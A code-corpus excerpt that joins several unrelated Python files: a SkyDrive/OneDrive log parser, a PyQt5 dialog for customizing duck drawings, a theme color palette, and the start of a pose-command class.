# For example: 07-25-13,16:06:31.820
_SDF_DATE_TIME = (
_TWO_DIGITS.setResultsName('month') + _HYPHEN +
_TWO_DIGITS.setResultsName('day') + _HYPHEN +
_TWO_DIGITS.setResultsName('year') + _COMMA +
text_parser.PyparsingConstants.TIME_ELEMENTS + pyparsing.Suppress('.') +
_THREE_DIGITS.setResultsName('milliseconds')).setResultsName(
'date_time')
_SDF_HEADER_START = (
pyparsing.Literal('######').suppress() +
pyparsing.Literal('Logging started.').setResultsName('log_start'))
# Multiline entry end marker, matched from right to left.
_SDF_ENTRY_END = pyparsing.StringEnd() | _SDF_HEADER_START | _SDF_DATE_TIME
_SDF_LINE = (
_SDF_DATE_TIME + _COMMA +
IGNORE_FIELD + _COMMA + IGNORE_FIELD + _COMMA + IGNORE_FIELD + _COMMA +
pyparsing.CharsNotIn(',').setResultsName('module') + _COMMA +
pyparsing.CharsNotIn(',').setResultsName('source_code') + _COMMA +
IGNORE_FIELD + _COMMA + IGNORE_FIELD + _COMMA +
pyparsing.CharsNotIn(',').setResultsName('log_level') + _COMMA +
pyparsing.SkipTo(_SDF_ENTRY_END).setResultsName('detail') +
pyparsing.ZeroOrMore(pyparsing.lineEnd()))
_SDF_HEADER = (
_SDF_HEADER_START +
pyparsing.Literal('Version=').setResultsName('version_string') +
pyparsing.Word(pyparsing.nums + '.').setResultsName('version_number') +
pyparsing.Literal('StartSystemTime:').suppress() +
_SDF_HEADER_DATE_TIME +
pyparsing.Literal('StartLocalTime:').setResultsName(
'local_time_string') +
pyparsing.SkipTo(pyparsing.lineEnd()).setResultsName('details') +
pyparsing.lineEnd())
LINE_STRUCTURES = [
('logline', _SDF_LINE),
('header', _SDF_HEADER)
]
def _ParseHeader(self, parser_mediator, structure):
"""Parse header lines and store appropriate attributes.
['Logging started.', 'Version=', '17.0.2011.0627',
[2013, 7, 25], 16, 3, 23, 291, 'StartLocalTime', '<details>']
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=structure.header_date_time)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(structure.header_date_time))
return
event_data = SkyDriveLogEventData()
# TODO: refactor detail to individual event data attributes.
event_data.detail = '{0:s} {1:s} {2:s} {3:s} {4:s}'.format(
structure.log_start, structure.version_string,
structure.version_number, structure.local_time_string,
structure.details)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def _ParseLine(self, parser_mediator, structure):
"""Parses a logline and store appropriate attributes.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
# TODO: Verify if date and time value is locale dependent.
month, day_of_month, year, hours, minutes, seconds, milliseconds = (
structure.date_time)
year += 2000
time_elements_tuple = (
year, month, day_of_month, hours, minutes, seconds, milliseconds)
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(structure.date_time))
return
event_data = SkyDriveLogEventData()
# Replace newlines with spaces in structure.detail to preserve output.
# TODO: refactor detail to individual event data attributes.
event_data.detail = structure.detail.replace('\n', ' ')
event_data.log_level = structure.log_level
event_data.module = structure.module
event_data.source_code = structure.source_code
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseRecord(self, parser_mediator, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): identifier of the structure of tokens.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Raises:
ParseError: when the structure type is unknown.
"""
if key not in ('header', 'logline'):
raise errors.ParseError(
'Unable to parse record, unknown structure: {0:s}'.format(key))
if key == 'logline':
self._ParseLine(parser_mediator, structure)
elif key == 'header':
self._ParseHeader(parser_mediator, structure)
def VerifyStructure(self, parser_mediator, lines):
"""Verify that this file is a SkyDrive log file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
lines (str): one or more lines from the text file.
Returns:
bool: True if this is the correct parser, False otherwise.
"""
try:
structure = self._SDF_HEADER.parseString(lines)
except pyparsing.ParseException:
logger.debug('Not a SkyDrive log file')
return False
try:
dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=structure.header_date_time)
except ValueError:
logger.debug(
'Not a SkyDrive log file, invalid date and time: {0!s}'.format(
structure.header_date_time))
return False
return True
class SkyDriveOldLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parse SkyDrive old log files."""
NAME = 'skydrive_log_old'
DESCRIPTION = 'Parser for OneDrive (or SkyDrive) old log files.'
_ENCODING = 'utf-8'
_FOUR_DIGITS = text_parser.PyparsingConstants.FOUR_DIGITS
_TWO_DIGITS = text_parser.PyparsingConstants.TWO_DIGITS
# Common pyparsing objects.
_COLON = pyparsing.Literal(':')
_EXCLAMATION = pyparsing.Literal('!')
# Date and time format used in the header is: DD-MM-YYYY hhmmss.###
# For example: 08-01-2013 21:22:28.999
_DATE_TIME = pyparsing.Group(
_TWO_DIGITS.setResultsName('month') + pyparsing.Suppress('-') +
_TWO_DIGITS.setResultsName('day_of_month') + pyparsing.Suppress('-') +
_FOUR_DIGITS.setResultsName('year') +
text_parser.PyparsingConstants.TIME_MSEC_ELEMENTS).setResultsName(
'date_time')
_SOURCE_CODE = pyparsing.Combine(
pyparsing.CharsNotIn(':') +
_COLON +
text_parser.PyparsingConstants.INTEGER +
_EXCLAMATION +
pyparsing.Word(pyparsing.printables)).setResultsName('source_code')
_LOG_LEVEL = (
pyparsing.Literal('(').suppress() +
pyparsing.SkipTo(')').setResultsName('log_level') +
pyparsing.Literal(')').suppress())
_LINE = (
_DATE_TIME + _SOURCE_CODE + _LOG_LEVEL +
_COLON + pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
# Sometimes the timestamped log line is followed by an empty line,
# then by a file name plus other data and finally by another empty
# line. It could happen that a logline is split in two parts.
# These lines will not be discarded and an event will be generated
# ad-hoc (see source), based on the last one if available.
_NO_HEADER_SINGLE_LINE = (
pyparsing.NotAny(_DATE_TIME) +
pyparsing.Optional(pyparsing.Literal('->').suppress()) +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
# Define the available log line structures.
LINE_STRUCTURES = [
('logline', _LINE),
('no_header_single_line', _NO_HEADER_SINGLE_LINE),
]
def __init__(self):
"""Initializes a parser object."""
super(SkyDriveOldLogParser, self).__init__()
self._last_date_time = None
self._last_event_data = None
self.offset = 0
def _ParseLogline(self, parser_mediator, structure):
"""Parse a logline and store appropriate attributes.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
# TODO: Verify if date and time value is locale dependent.
month, day_of_month, year, hours, minutes, seconds, milliseconds = (
structure.date_time)
time_elements_tuple = (
year, month, day_of_month, hours, minutes, seconds, milliseconds)
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(structure.date_time))
return
event_data = SkyDriveOldLogEventData()
event_data.log_level = structure.log_level
event_data.offset = self.offset
event_data.source_code = structure.source_code
event_data.text = structure.text
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
self._last_date_time = date_time
self._last_event_data = event_data
def _ParseNoHeaderSingleLine(self, parser_mediator, structure):
"""Parse an isolated header line and store appropriate attributes.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
if not self._last_event_data:
logger.debug('SkyDrive, found isolated line with no previous events')
return
event_data = SkyDriveOldLogEventData()
event_data.offset = self._last_event_data.offset
event_data.text = structure.text
event = time_events.DateTimeValuesEvent(
self._last_date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
# TODO think to a possible refactoring for the non-header lines.
self._last_date_time = None
self._last_event_data = None
def ParseRecord(self, parser_mediator, key, structure):
"""Parse each record structure and return an EventObject if applicable.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): identifier of the structure of tokens.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Raises:
ParseError: when the structure type is unknown.
"""
if key not in ('logline', 'no_header_single_line'):
raise errors.ParseError(
'Unable to parse record, unknown structure: {0:s}'.format(key))
if key == 'logline':
self._ParseLogline(parser_mediator, structure)
elif key == 'no_header_single_line':
self._ParseNoHeaderSingleLine(parser_mediator, structure)
def VerifyStructure(self, parser_mediator, line):
"""Verify that this file is a SkyDrive old log file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
line (str): line from a text file.
Returns:
bool: True if the line is in the expected format, False if not.
"""
try:
structure = self._LINE.parseString(line)
except pyparsing.ParseException:
logger.debug('Not a SkyDrive old log file')
return False
day_of_month, month, year, hours, minutes, seconds, milliseconds = (
structure.date_time)
time_elements_tuple = (
year, month, day_of_month, hours, minutes, seconds, milliseconds)
try:
dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
logger.debug(
'Not a SkyDrive old log file, invalid date and time: {0!s}'.format(
structure.date_time))
return False
return True
manager.ParsersManager.RegisterParsers([
SkyDriveLogParser, SkyDriveOldLogParser])
| StarcoderdataPython |
3253895 | <gh_stars>0
"""
this file contains the definition of the qui window for the property
settings for ducks
"""
from PyQt5 import QtCore, QtWidgets, QtGui, uic
from Utils import save_eucl_file
from Dialog.Colour import ColourDialog
from Constants import *
#fill QT interface with the correct values
def fill_fields(dialog):
point = dialog.scene.eucl["points"][dialog.pt_idx]
if point["duck"]["show"] == True:
dialog.ui.duck_show.setChecked(True)
else:
dialog.ui.duck_show.setChecked(False)
if point["duck"]["type"] == 'random':
dialog.all_group_enabled_disabled(False)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.rad_random.setChecked(True)
if point["duck"]["type"] == 'special':
dialog.all_group_enabled_disabled(False)
dialog.ui.special_group.setEnabled(True)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.rad_special.setChecked(True)
if point["duck"]["type"] == 'custom':
dialog.all_group_enabled_disabled(True)
dialog.ui.special_group.setEnabled(False)
dialog.ui.chess_group.setEnabled(False)
dialog.checkb_enabled_disabled(True)
dialog.checkb_checked()
dialog.ui.rad_custom.setChecked(True)
if point["duck"]["type"] == 'chess':
dialog.all_group_enabled_disabled(False)
dialog.ui.chess_group.setEnabled(True)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.rad_chess.setChecked(True)
if dialog.pt_idx == 0:
dialog.all_group_enabled_disabled(False)
dialog.ui.body_group.setEnabled(True)
dialog.checkb_enabled_disabled(False)
dialog.ui.special_combo.setCurrentIndex(DUCK_SPECIAL.index(point["duck"]["special"]))
dialog.ui.chess_combo.setCurrentIndex(DUCK_CHESS.index(point["duck"]["chess"]))
dialog.ui.bill_combo.setCurrentIndex(DUCK_BILLS.index(point["duck"]["bill"]))
dialog.ui.hair_combo.setCurrentIndex(DUCK_HAIRS.index(point["duck"]["hair"]))
dialog.ui.glasses_combo.setCurrentIndex(DUCK_GLASSESS.index(point["duck"]["glasses"]))
dialog.ui.hat_combo.setCurrentIndex(DUCK_HATS.index(point["duck"]["hat"]))
dialog.ui.necklace_combo.setCurrentIndex(DUCK_NECKLACES.index(point["duck"]["necklace"]))
dialog.ui.accessories_combo.setCurrentIndex(DUCK_ACCESSORIES.index(point["duck"]["accessories"]))
dialog.ui.bubble_combo.setCurrentIndex(DUCK_SPEECH.index(point["duck"]["thought"]))
dialog.ui.size_hslider.setValue(point["duck"]["size"]*10)
dialog.ui.size_label.setText(str(point["duck"]["size"]))
dialog.ui.le_bubble_text.setText(point["duck"]["thought_text"])
dialog.ui.le_signpost_text.setText(point["duck"]["accessories_text"])
duck = point["duck"]
if not duck["clothing"]["show"]:
dialog.ui.duck_clothing.setChecked(False)
else:
dialog.ui.duck_clothing.setChecked(True)
if duck["water"][0] == 'F':
dialog.ui.duck_water.setChecked(False)
else:
dialog.ui.duck_water.setChecked(True)
if duck["eyebrows"][0] == 'F':
dialog.ui.duck_eyebrows.setChecked(False)
else:
dialog.ui.duck_eyebrows.setChecked(True)
if duck["beard"][0] == 'F':
dialog.ui.duck_beard.setChecked(False)
else:
dialog.ui.duck_beard.setChecked(True)
if duck["buttons"][0] == 'F':
dialog.ui.duck_buttons.setChecked(False)
else:
dialog.ui.duck_buttons.setChecked(True)
if duck["lapel"][0] == 'F':
dialog.ui.duck_lapel.setChecked(False)
else:
dialog.ui.duck_lapel.setChecked(True)
if duck["horsetail"][0] == 'F':
dialog.ui.duck_horse_tail.setChecked(False)
else:
dialog.ui.duck_horse_tail.setChecked(True)
if duck["clothing"]["tshirt"][0] == 'F':
dialog.ui.duck_tshirt.setChecked(False)
else:
dialog.ui.duck_tshirt.setChecked(True)
if duck["clothing"]["jacket"][0] == 'F':
dialog.ui.duck_jacket.setChecked(False)
else:
dialog.ui.duck_jacket.setChecked(True)
if duck["clothing"]["tie"][0] == 'F':
dialog.ui.duck_tie.setChecked(False)
else:
dialog.ui.duck_tie.setChecked(True)
if duck["clothing"]["bowtie"][0] == 'F':
dialog.ui.duck_bowtie.setChecked(False)
else:
dialog.ui.duck_bowtie.setChecked(True)
if duck["clothing"]["aodai"][0] == 'F':
dialog.ui.duck_aodai.setChecked(False)
else:
dialog.ui.duck_aodai.setChecked(True)
if duck["clothing"]["cape"][0] == 'F':
dialog.ui.duck_cape.setChecked(False)
else:
dialog.ui.duck_cape.setChecked(True)
if dialog.ui.accessories_combo.currentIndex() in [2, 3]:
dialog.ui.le_signpost_text.setEnabled(True)
dialog.ui.label_signpost.setEnabled(True)
else:
dialog.ui.le_signpost_text.setEnabled(False)
dialog.ui.label_signpost.setEnabled(False)
if duck["accessories"] in DUCK_EXTRA:
dialog.ui.label_accessories_extra.setEnabled(True)
dialog.ui.pb_accessories_extra.setEnabled(True)
dialog.ui.label_accessories_extra.setText('extra ' + DUCK_EXTRA[duck["accessories"]])
else:
dialog.ui.label_accessories_extra.setEnabled(False)
dialog.ui.pb_accessories_extra.setEnabled(False)
dialog.ui.label_accessories_extra.setText('extra')
if duck["hat"] in DUCK_EXTRA:
dialog.ui.label_hat_extra.setEnabled(True)
dialog.ui.pb_hat_extra.setEnabled(True)
dialog.ui.label_hat_extra.setText('extra ' + DUCK_EXTRA[duck["hat"]])
else:
dialog.ui.label_hat_extra.setEnabled(False)
dialog.ui.pb_hat_extra.setEnabled(False)
dialog.ui.label_hat_extra.setText('extra')
# class for the duck window
class DuckPropertiesDialog(QtWidgets.QDialog):
def __init__ (self, scene, pt_idx):
super(DuckPropertiesDialog, self).__init__ ()
self.ui = uic.loadUi('layouts/duck_dialog.ui', self)
self.setWindowTitle("Duck properties")
self.scene = scene
self.pt_idx = pt_idx
fill_fields(self)
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
self.ui.duck_show.stateChanged.connect(
lambda state: self.checkb_state_changed(state, duck, "show"))
self.ui.rad_random.clicked.connect(self.rad_random_clicked)
self.ui.rad_special.clicked.connect(self.rad_special_clicked)
self.ui.rad_custom.clicked.connect(self.rad_custom_clicked)
self.ui.rad_chess.clicked.connect(self.rad_chess_clicked)
self.ui.special_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_SPECIAL, duck, "special"))
self.ui.chess_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_CHESS, duck, "chess"))
self.ui.bill_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_BILLS, duck, "bill"))
self.ui.hair_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_HAIRS, duck, "hair"))
self.ui.glasses_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_GLASSESS, duck, "glasses"))
self.ui.hat_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_HATS, duck, "hat"))
self.ui.necklace_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_NECKLACES, duck, "necklace"))
self.ui.accessories_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_ACCESSORIES, duck, "accessories"))
self.ui.duck_clothing.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "show"))
self.ui.duck_water.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "water"))
self.ui.duck_eyebrows.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "eyebrows"))
self.ui.duck_beard.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "beard"))
self.ui.duck_buttons.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "buttons"))
self.ui.duck_lapel.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "lapel"))
self.ui.duck_horse_tail.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck, "horsetail"))
self.ui.duck_tshirt.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "tshirt"))
self.ui.duck_jacket.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "jacket"))
self.ui.duck_tie.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "tie"))
self.ui.duck_bowtie.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "bowtie"))
self.ui.duck_aodai.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "aodai"))
self.ui.duck_cape.stateChanged.connect(
lambda state : self.checkb_state_changed(state, duck["clothing"], "cape"))
self.ui.size_hslider.valueChanged.connect(
lambda value : self.hslider_moved(value, duck, "size", self.ui.size_label, 10))
self.ui.size_hslider.sliderReleased.connect(self.hslider_released)
self.ui.pb_bill.clicked.connect(
lambda : self.colour_open(duck, "bill_colour"))
self.ui.pb_hair.clicked.connect(
lambda : self.colour_open(duck, "hair_colour"))
self.ui.pb_glasses.clicked.connect(
lambda : self.colour_open(duck, "glasses_colour"))
self.ui.pb_hat.clicked.connect(
lambda : self.colour_open(duck, "hat_colour"))
self.ui.pb_hat_extra.clicked.connect(
lambda : self.colour_open(duck, "hat_extra_colour"))
self.ui.pb_accessories.clicked.connect(
lambda : self.colour_open(duck, "accessories_colour"))
self.ui.pb_accessories_extra.clicked.connect(
lambda : self.colour_open(duck, "accessories_extra_colour"))
self.ui.pb_necklace.clicked.connect(
lambda : self.colour_open(duck, "necklace_colour"))
self.ui.pb_body.clicked.connect(
lambda : self.colour_open(duck, "body_colour"))
self.ui.pb_tshirt.clicked.connect(
lambda : self.colour_open(duck["clothing"], "tshirt"))
self.ui.pb_jacket.clicked.connect(
lambda : self.colour_open(duck["clothing"], "jacket"))
self.ui.pb_tie.clicked.connect(
lambda : self.colour_open(duck["clothing"], "tie"))
self.ui.pb_bowtie.clicked.connect(
lambda : self.colour_open(duck["clothing"], "bowtie"))
self.ui.pb_aodai.clicked.connect(
lambda : self.colour_open(duck["clothing"], "aodai"))
self.ui.pb_cape.clicked.connect(
lambda : self.colour_open(duck["clothing"], "cape"))
self.ui.pb_water.clicked.connect(
lambda : self.colour_open(duck, "water"))
self.ui.pb_eyebrows.clicked.connect(
lambda : self.colour_open(duck, "eyebrows"))
self.ui.pb_beard.clicked.connect(
lambda : self.colour_open(duck, "beard"))
self.ui.pb_buttons.clicked.connect(
lambda : self.colour_open(duck, "buttons"))
self.ui.pb_lapel.clicked.connect(
lambda : self.colour_open(duck, "lapel"))
self.ui.pb_horse_tail.clicked.connect(
lambda : self.colour_open(duck, "horsetail"))
self.ui.pb_bubble.clicked.connect(
lambda : self.colour_open(duck, "thought_colour"))
self.ui.le_signpost_text.editingFinished.connect(self.le_signpost_text_editing_finished)
self.ui.le_bubble_text.editingFinished.connect(self.le_bubble_text_editing_finished)
self.ui.bubble_combo.currentIndexChanged.connect(
lambda value : self.cb_selector_current_idx_changed(value, DUCK_SPEECH, duck, "thought"))
def keyPressEvent(self,event):
# performs autocompile when f5 is pressed
if event.matches(QtGui.QKeySequence.Refresh):
previous_autocompile = self.scene.autocompile
self.scene.autocompile = True
self.scene.compile_tkz_and_render()
self.scene.autocompile = previous_autocompile
elif event.matches(QtGui.QKeySequence.Save):
Utils.save(self) #.save_eucl_file('data.json', self.scene.eucl)
elif event.matches(QtGui.QKeySequence.SaveAs):
Utils.save_as(self) #.save_eucl_file('data.json', self.scene.eucl)
def checkb_state_changed(self, state, my_object, property):
if state == QtCore.Qt.Unchecked:
if self.pt_idx == 0 and property == 'show':
for point in self.scene.eucl["points"]:
point["duck"]["show"] = False
if property in ["water", "eyebrows", "beard", "buttons", "lapel", "horsetail",\
"tshirt", "jacket", "tie", "bowtie", "aodai", "cape"]:
my_object[property] = 'F' + my_object[property][1:]
else:
my_object[property] = False
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
elif state == QtCore.Qt.Checked:
if self.pt_idx == 0 and property == 'show':
for point in self.scene.eucl["points"]:
point["duck"]["show"] = True
if property in ["water", "eyebrows", "beard", "buttons", "lapel", "horsetail",\
"tshirt", "jacket", "tie", "bowtie", "aodai", "cape"]:
my_object[property] = 'T' + my_object[property][1:]
else:
my_object[property] = True
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_random_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'random'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'random'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_special_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'special'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'special'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_chess_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'chess'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'chess'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def rad_custom_clicked(self):
if self.pt_idx == 0:
for point in self.scene.eucl["points"]:
point["duck"]["type"] = 'custom'
self.scene.eucl["points"][self.pt_idx]["duck"]["type"] = 'custom'
fill_fields(self)
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def checkb_checked(self):
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
if not duck["clothing"]["show"]:
self.ui.clothing_group.setEnabled(False)
else:
self.ui.clothing_group.setEnabled(True)
if duck["water"][0] == 'F':
self.ui.water_group.setEnabled(False)
else:
self.ui.water_group.setEnabled(True)
if duck["eyebrows"][0] == 'F':
self.ui.eyebrows_group.setEnabled(False)
else:
self.ui.eyebrows_group.setEnabled(True)
if duck["beard"][0] == 'F':
self.ui.beard_group.setEnabled(False)
else:
self.ui.beard_group.setEnabled(True)
if duck["buttons"][0] == 'F':
self.ui.buttons_group.setEnabled(False)
else:
self.ui.buttons_group.setEnabled(True)
if duck["lapel"][0] == 'F':
self.ui.lapel_group.setEnabled(False)
else:
self.ui.lapel_group.setEnabled(True)
if duck["horsetail"][0] == 'F':
self.ui.horse_tail_group.setEnabled(False)
else:
self.ui.horse_tail_group.setEnabled(True)
def checkb_enabled_disabled(self, boolean):
self.ui.duck_clothing.setEnabled(boolean)
self.ui.duck_water.setEnabled(boolean)
self.ui.duck_eyebrows.setEnabled(boolean)
self.ui.duck_beard.setEnabled(boolean)
self.ui.duck_buttons.setEnabled(boolean)
self.ui.duck_lapel.setEnabled(boolean)
self.ui.duck_horse_tail.setEnabled(boolean)
def all_group_enabled_disabled(self, boolean):
self.ui.bill_group.setEnabled(boolean)
self.ui.hair_group.setEnabled(boolean)
self.ui.glasses_group.setEnabled(boolean)
self.ui.clothing_group.setEnabled(boolean)
self.ui.water_group.setEnabled(boolean)
self.ui.eyebrows_group.setEnabled(boolean)
self.ui.beard_group.setEnabled(boolean)
self.ui.buttons_group.setEnabled(boolean)
self.ui.lapel_group.setEnabled(boolean)
self.ui.horse_tail_group.setEnabled(boolean)
self.ui.necklace_group.setEnabled(boolean)
self.ui.hat_group.setEnabled(boolean)
self.ui.accessories_group.setEnabled(boolean)
self.ui.special_group.setEnabled(boolean)
self.ui.chess_group.setEnabled(boolean)
self.ui.thought_group.setEnabled(boolean)
self.ui.body_group.setEnabled(boolean)
def cb_selector_current_idx_changed(self, value, vlist, my_object, property):
my_object[property] = vlist[value]
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
fill_fields(self)
def hslider_moved(self, value, my_object, property, label_to_set, factor=1):
if self.pt_idx == 0 and property == 'size':
for point in self.scene.eucl["points"]:
point["duck"]["size"] = value/factor
my_object[property] = value/factor
label_to_set.setText('%2.2f' % (value/factor))
def hslider_released(self):
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
def le_signpost_text_editing_finished(self):
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
if not self.ui.le_signpost_text.hasFocus():
try:
duck["accessories_text"] = self.ui.le_signpost_text.text()
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
except:
self.ui.le_signpost_text.setText(duck["accessories_text"])
else:
self.ui.duck_show.setFocus()
def le_bubble_text_editing_finished(self):
duck = self.scene.eucl["points"][self.pt_idx]["duck"]
if not self.ui.le_bubble_text.hasFocus():
try:
duck["thought_text"] = self.ui.le_bubble_text.text()
self.scene.compile_tkz_and_render()
self.scene.add_new_undo_item()
except:
self.ui.le_bubble_text.setText(duck["thought_text"])
else:
self.ui.duck_show.setFocus()
def colour_open(self, my_object, property):
dialog_colour = ColourDialog(self.scene, self.pt_idx, my_object, property)
dialog_colour.setWindowIcon(QtGui.QIcon("icon/ico.png"))
dialog_colour.exec_()
#
| StarcoderdataPython |
84087 | <reponame>desty2k/QDarkStyleSheet
# colorsystem.py is the full list of colors that can be used to easily create themes.
class Gray:
B0 = '#000000'
B10 = '#19232D'
B20 = '#293544'
B30 = '#37414F'
B40 = '#455364'
B50 = '#54687A'
B60 = '#60798B'
B70 = '#788D9C'
B80 = '#9DA9B5'
B90 = '#ACB1B6'
B100 = '#B9BDC1'
B110 = '#C9CDD0'
B120 = '#CED1D4'
B130 = '#E0E1E3'
B140 = '#FAFAFA'
B150 = '#FFFFFF'
class Blue:
B0 = '#000000'
B10 = '#062647'
B20 = '#26486B'
B30 = '#375A7F'
B40 = '#346792'
B50 = '#1A72BB'
B60 = '#057DCE'
B70 = '#259AE9'
B80 = '#37AEFE'
B90 = '#73C7FF'
B100 = '#9FCBFF'
B110 = '#C2DFFA'
B120 = '#CEE8FF'
B130 = '#DAEDFF'
B140 = '#F5FAFF'
B150 = '##FFFFFF'
class Green:
B0 = '#000000'
B10 = '#064738'
B20 = '#055C49'
B30 = '#007A5E'
B40 = '#008760'
B50 = '#019D70'
B60 = '#02BA85'
B70 = '#20C997'
B80 = '#44DEB0'
B90 = '#3BEBB7'
B100 = '#88F2D3'
B110 = '#B0F5E1'
B120 = '#D1FBEE'
B130 = '#E4FFF7'
B140 = '#F5FFFD'
B150 = '#FFFFFF'
class Red:
B0 = '#000000'
B10 = '#470606'
B20 = '#760B0B'
B30 = '#AF0F0F'
B40 = '#D4140B'
B50 = '#DE321F'
B60 = '#E24232'
B70 = '#E74C3C'
B80 = '#F66657'
B90 = '#F88478'
B100 = '#FFACA4'
B110 = '#FFC3BD'
B120 = '#FEDDDA'
B130 = '#FFEEEE'
B140 = '#FFF5F5'
B150 = '#FFFFFF'
class Orange:
B0 = '#000000'
B10 = '#471D06'
B20 = '#692907'
B30 = '#AB3E00'
B40 = '#CE4B01'
B50 = '#E05E15'
B60 = '#E57004'
B70 = '#F37E12'
B80 = '#FF993B'
B90 = '#FFB950'
B100 = '#FFCF84'
B110 = '#FFDDA7'
B120 = '#FFEACA'
B130 = '#FFF3E2'
B140 = '#FFFBF5'
B150 = '#FFFFFF'
class GroupDark:
B10 = '#E11C1C'
B20 = '#FF8A00'
B30 = '#88BA00'
B40 = '#2DB500'
B50 = '#3FC6F0'
B60 = '#107EEC'
B70 = '#5C47E0'
B80 = '#7F27C5'
B90 = '#C88AFA'
B100 = '#AF2294'
B110 = '#DB4D8E'
B120 = '#38D4A4'
class GroupLight:
B10 = '#FF6700'
B20 = '#FFB000'
B30 = '#FFE600'
B40 = '#7FDD05'
B50 = '#00A585'
B60 = '#22BCF2'
B70 = '#1256CC'
B80 = '#803AD0'
B90 = '#B568F2'
B100 = '#CC2782'
B110 = '#FF71BF'
B120 = '#7EE8C7'
| StarcoderdataPython |
3343467 | import json
import math
class Pose:
HOLD = "HOLD"
TURN_RIGHT = "TURN_RIGHT"
TURN_LEFT = "TURN_LEFT"
THROTTLE_UP = "THROTTLE_UP"
THROTTLE_DOWN = "THROTTLE_DOWN"
